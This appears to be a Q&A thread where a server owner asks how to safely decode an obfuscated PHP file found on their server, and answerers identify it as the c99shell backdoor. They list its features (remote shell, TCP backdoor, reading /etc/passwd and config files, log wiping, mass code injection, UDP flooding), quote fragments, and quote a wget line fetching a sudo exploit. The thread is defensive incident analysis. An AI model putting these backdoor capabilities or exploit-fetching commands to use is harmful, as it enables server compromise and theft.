22

WARNING: This is a possible exploit. Do not run directly on your server if you're not sure what to do with this.

http://pastehtml.com/view/1b1m2r6.txt

I believe this was uploaded via an insecure upload script. How do I decode and uncompress this code? Running it in the browser might execute it as a shell script, open up a port or something.

I can do a base64 decode online but i couldn't really decompress it.

AstroCB
  • 12,337
  • 20
  • 57
  • 73
HyderA
  • 20,651
  • 42
  • 112
  • 180
  • Is it possible for you to paste the code here? I'm not able to open this link.. – jyz Sep 14 '10 at 11:04
  • 1
    I'm afraid it's executed yet. :( Btw you can decompress it but do not eval it. – fabrik Sep 14 '10 at 11:05
  • 10
    I copied the code off to do some testing, and unbelievably MSE picked it up *on the clipboard cache file*, and directed me to this online virus definition: http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?name=Backdoor%3aPHP%2fC99shell.E&threatid=2147621086 – Yi Jiang Sep 14 '10 at 11:31

5 Answers5

32

So there's a string. It's gzipped and base64 encoded, and the code decodes the base64 and then uncompresses it.

When that's done, I am resulted with this:

<? eval(base64_decode('...')); ?>

Another layer of base64, which is 720440 bytes long.

Now, base64 decoding that, we have 506961 bytes of exploit code.

I'm still examining the code, and will update this answer when I have more understanding. The code is huge.

Still reading through the code, and the (very well-done) exploit allows these tools to be exposed to the hacker:

  • TCP backdoor setup
  • unauthorised shell access
  • reading of all htpasswd, htaccess, password and configuration files
  • log wiping
  • MySQL access (read, write)
  • append code to all files matching a name pattern (mass exploit)
  • RFI/LFI scanner
  • UDP flooding
  • kernel information

This is probably a professional PHP-based server-wide exploit toolkit, and seeing as it's got a nice HTML interface and the whole lot, it could be easily used by a pro hacker, or even a script kiddie.

This exploit is called c99shell (thanks Yi Jiang) and it turns out to have been quite popular, being talked about and running for a few years already. There are many results on Google for this exploit.

Delan Azabani
  • 79,602
  • 28
  • 170
  • 210
  • 3
    Wow, it's a complete backdoor setup. Though the guy who uploaded it is probably another script kiddie. It was hosted directly under our apache root directory. And a real hacker would have deleted it after setting up the backdoor. – HyderA Sep 14 '10 at 11:21
  • It's got a shell script in it, a string called $backdoor, which is written out and exec'd. The PHP then tells the user this has been done and to connect with netcat. –  Sep 14 '10 at 11:23
  • 4
    Shit like this scares me `array("wget Sudo Exploit","wget http://www.securityfocus.com/data/vulnerabilities/exploits/sudo-exploit.c"),` – HyderA Sep 14 '10 at 11:24
  • @gAMBOOKa only affects sudo 1.6.8. You do regularly update your software, right...?!! `sudo -V` to find out if this affects you. –  Sep 14 '10 at 11:31
  • @Ninefingers : I'm safe! Thanks for the tip. – HyderA Sep 14 '10 at 11:38
  • @Delan if you have access to the shell, can you not just run apt-get/yum? Distros should distribute the latest versions? –  Sep 14 '10 at 12:36
  • `Sudo version 1.6.8p12` am I vulnerable? – jyz Oct 14 '10 at 14:24
16

Looking at Delan's decoded source, it appears to be a full-fledged backdoor providing a web interface that can be used to control the server in various ways. Telling fragments from the source:

echo '<center>Are you sure you want to install an IP:Port proxy on this
website/server?<br />

or

<b>Mass Code Injection:</b><br><br>
Use this to add PHP to the end of every .php page in the directory specified.

or

echo "<br><b>UDP Flood</b><br>Completed with $pakits (" . 
     round(($pakits*65)/1024, 2) . " MB) packets averaging ". 
     round($pakits/$exec_time, 2) . " packets per second \n";

or 

if (!$fp) {echo "Can't get /etc/passwd for password-list.";}

I'd advise you to scrub that server and reinstall everything from scratch.

Michael Borgwardt
  • 342,105
  • 78
  • 482
  • 720
7

I know Delan Azabani has done this, but just so you actually know how he got the data out:

Just in case you're wondering how to decompress this, use base64 -d filename > output to parse base64 strings and gunzip file.name.gz to parse gzipped data.

The trick is in recognising that what you've got is base64 or gunzip and decompressing the right bits.

This way it goes absolutely nowhere near a JS parser or PHP parser.

3

First, replace the eval with an echo to see what code it would execute if you'd let it. Send the output of that script to another file, say, test2.php. In that file, do the same trick again. Run it, and it will output the complete malicious program (it's quite a beast), ~4k lines of hacker's delight.

tdammers
  • 20,353
  • 1
  • 39
  • 56
2

This is code for php shell.
to decode this

replace replace eval("?>". with print( run this

php5 file.php > file2.php

then replace eval with print and run in browser. http://loclhost/file2.php

jcubic
  • 61,973
  • 54
  • 229
  • 402